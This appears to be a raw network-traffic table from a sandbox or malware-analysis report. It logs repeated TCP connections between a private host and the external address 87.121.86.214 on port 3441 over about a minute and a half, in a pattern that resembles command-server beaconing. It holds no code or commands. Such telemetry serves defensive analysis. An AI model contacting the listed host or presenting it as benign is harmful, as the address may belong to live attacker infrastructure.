                                                        Dec 27, 2024 14:54:51.216767073 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:51.336327076 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:51.609919071 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:51.611885071 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:51.731376886 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:51.731453896 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:51.850984097 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:52.126940012 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:52.127116919 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:52.246643066 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:52.246706963 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:52.367197037 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:52.642364025 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:52.693829060 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:52.834300041 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:52.853184938 CET498883441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:52.881323099 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:52.972879887 CET34414988887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:52.972948074 CET498883441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:52.973073959 CET498883441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:53.092617035 CET34414988887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:53.321190119 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:53.365689039 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:54.313059092 CET34414988887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:54.313222885 CET498883441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:54.323913097 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:54.365700960 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:54.432770014 CET34414988887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:54.725393057 CET34414988887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:54.726156950 CET498933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:54.771940947 CET498883441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:54.845737934 CET34414989387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:54.845808983 CET498933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:54.846015930 CET498933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:54.965483904 CET34414989387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:55.325047970 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:55.473175049 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:56.236960888 CET34414989387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:56.237163067 CET498933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:56.326900005 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:56.356874943 CET34414989387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:56.553204060 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:56.640678883 CET34414989387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:56.784739017 CET498933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:56.954999924 CET498983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:57.074629068 CET34414989887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:57.074707985 CET498983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:57.074909925 CET498983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:57.194406986 CET34414989887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:57.327467918 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:57.435082912 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:58.359469891 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:58.361208916 CET34414989887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:58.364083052 CET498983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:58.483678102 CET34414989887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:58.556072950 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:58.765249014 CET34414989887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:58.766271114 CET499033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:58.885817051 CET34414990387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:58.885886908 CET499033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:58.886023998 CET499033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:58.928191900 CET498983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:59.005460024 CET34414990387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:59.359411955 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:59.445990086 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:00.132607937 CET34414990387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:00.136320114 CET499033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:00.255870104 CET34414990387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:00.375099897 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:00.460283995 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:00.529923916 CET34414990387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:00.530750990 CET499093441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:00.650276899 CET34414990987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:00.651922941 CET499093441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:00.652070045 CET499093441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:00.725069046 CET499033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:00.771486998 CET34414990987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:01.375575066 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:01.441054106 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:01.990731001 CET34414990987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:01.991332054 CET499093441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:02.110930920 CET34414990987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:02.375319004 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:02.403594017 CET34414990987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:02.459484100 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:02.459486008 CET499093441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:03.375211954 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:03.459450960 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:04.411690950 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:04.459475040 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:05.411684990 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:05.459475040 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:06.412647963 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:06.461724997 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:07.420140028 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:07.597119093 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:08.420166969 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:08.665743113 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:09.421483994 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:09.510185957 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:10.422678947 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:10.663733006 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:11.422481060 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:11.553199053 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:12.424048901 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:12.665730000 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:13.427628994 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:13.468142986 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:14.435910940 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:14.664145947 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:15.466686010 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:15.662580967 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:16.430856943 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:16.553738117 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:17.432337046 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:17.553201914 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:18.432075977 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:18.662600040 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:19.432262897 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:19.553241014 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:20.434779882 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:20.553200960 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:21.435147047 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:21.633529902 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:22.436214924 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:22.553211927 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:23.438505888 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:23.665724993 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:24.437295914 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:24.499521971 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:25.513915062 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:25.662616014 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:26.514477015 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:26.566086054 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:27.513993025 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:27.665725946 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:28.515101910 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:28.647502899 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:29.516345024 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:29.618766069 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:30.543896914 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:30.662599087 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:31.631567955 CET498883441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:31.631572962 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:31.631642103 CET498933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:31.631688118 CET498983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:31.631691933 CET499033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:31.631717920 CET499093441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:31.648488998 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:31.648614883 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:31.751434088 CET34414988887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:31.751676083 CET498883441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:31.752336025 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:31.752347946 CET34414989387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:31.752358913 CET34414989887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:31.752441883 CET498933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:31.752449989 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:31.752460957 CET34414990387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:31.752470970 CET34414990987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:31.752475023 CET498983441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:31.752526999 CET499033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:31.752533913 CET499093441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:35.649734020 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:35.769572973 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:35.769879103 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:35.769974947 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:35.889699936 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:37.302251101 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:37.305128098 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:37.424674988 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:37.717979908 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:37.718519926 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:37.838157892 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:37.838212013 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:37.957828045 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:38.252923965 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:38.253045082 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:38.372515917 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:38.372566938 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:38.493865967 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:38.926397085 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:39.041125059 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:39.135490894 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:39.137957096 CET499923441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:39.240710020 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:39.257481098 CET34414999287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:39.258404970 CET499923441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:39.258495092 CET499923441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:39.378021955 CET34414999287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:39.665726900 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:39.741337061 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:40.688987017 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:40.697021961 CET34414999287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:40.697283983 CET499923441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:40.817003012 CET34414999287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:40.837724924 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:41.100342035 CET34414999287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:41.105726957 CET499933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:41.162724018 CET499923441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:41.225814104 CET34414999387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:41.226768970 CET499933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:41.226887941 CET499933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:41.346451998 CET34414999387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:41.667273998 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:41.725718021 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:42.636049986 CET34414999387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:42.636219025 CET499933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:42.669701099 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:42.725078106 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:42.755764961 CET34414999387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:43.036847115 CET34414999387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:43.038609028 CET499943441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:43.125972033 CET499933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:43.158436060 CET34414999487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:43.158637047 CET499943441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:43.158775091 CET499943441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:43.278291941 CET34414999487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:43.705775976 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:43.834475994 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:45.004090071 CET34414999487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:45.004106998 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:45.004360914 CET499943441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:45.009783030 CET34414999487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:45.013813972 CET499943441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:45.124890089 CET34414999487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:45.133820057 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:45.137916088 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:45.416883945 CET34414999487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:45.418138027 CET499953441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:45.461741924 CET499943441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:45.537705898 CET34414999587.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:45.537802935 CET499953441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:45.539195061 CET499953441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:45.658655882 CET34414999587.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:45.678271055 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:45.725192070 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:46.827194929 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:46.932292938 CET34414999587.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:46.933907986 CET499953441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:47.037719965 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:47.053520918 CET34414999587.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:47.333429098 CET34414999587.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:47.337719917 CET499963441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:47.457432985 CET34414999687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:47.457825899 CET499963441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:47.457956076 CET499963441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:47.459472895 CET499953441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:47.577568054 CET34414999687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:47.678530931 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:47.725718975 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:48.680725098 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:48.725100040 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:48.968786001 CET34414999687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:48.968971014 CET499963441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:49.088577986 CET34414999687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:49.371284008 CET34414999687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:49.461723089 CET499963441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:49.679563999 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:49.740864992 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:50.680577040 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:50.725128889 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:51.715184927 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:51.834466934 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:52.697470903 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:52.837722063 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:53.698942900 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:53.834475040 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:54.977281094 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:55.039722919 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:55.149852991 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:55.155720949 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:55.699510098 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:55.834451914 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:56.701759100 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:56.931370020 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:57.826951981 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:57.928208113 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:58.707526922 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:58.837766886 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:55:59.708127975 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:55:59.835745096 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:00.708376884 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:00.834479094 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:01.709891081 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:01.840059996 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:02.710450888 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:02.928318024 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:03.710586071 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:03.928210974 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:05.098965883 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:05.225815058 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:05.229800940 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:05.229857922 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:05.724327087 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:05.928286076 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:06.724308968 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:06.929718971 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:07.725459099 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:07.834460974 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:08.730778933 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:08.929711103 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:09.731796026 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:09.837716103 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:10.762340069 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:10.928894997 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:11.749989986 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:11.837718964 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:12.751275063 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:12.834465981 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:13.753432035 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:13.930229902 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:14.754373074 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:14.834469080 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:15.754189968 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:15.834597111 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:16.755532980 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:16.834470034 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:17.756304979 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:17.834498882 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:18.649468899 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:18.649682045 CET499923441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:18.649713993 CET499933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:18.649743080 CET499943441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:18.650041103 CET499953441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:18.650079012 CET499963441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:18.756196976 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:18.756257057 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:18.769413948 CET34414998687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:18.769463062 CET499863441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:18.770194054 CET34414999287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:18.770206928 CET34414999387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:18.770245075 CET499923441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:18.770267963 CET499933441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:18.770288944 CET34414999487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:18.770299911 CET34414999587.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:18.770311117 CET34414999687.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:56:18.770351887 CET499953441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:18.770355940 CET499943441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:18.770380020 CET499963441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:56:22.983609915 CET499973441192.168.2.1087.121.86.214
